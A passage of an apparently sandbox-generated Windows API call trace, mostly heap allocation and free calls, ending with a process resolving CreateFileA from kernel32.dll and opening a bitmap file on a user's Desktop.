(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0032.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0032.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.149] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.151] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cdc0 [0032.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cdc0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0032.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.152] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0032.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0032.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cdc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0032.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.152] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0032.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0032.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d) returned 0x7ab260 [0032.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp", cchWideChar=61, lpMultiByteStr=0x7ab260, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp", lpUsedDefaultChar=0x0) returned 61 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.153] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xhmpo 5df6plfz4yar.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0032.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7a) returned 0x7d5b30 [0032.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=61, lpWideCharStr=0x7d5b30, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp") returned 61 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.155] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.156] HeapFree (in: hHeap=0x770000, 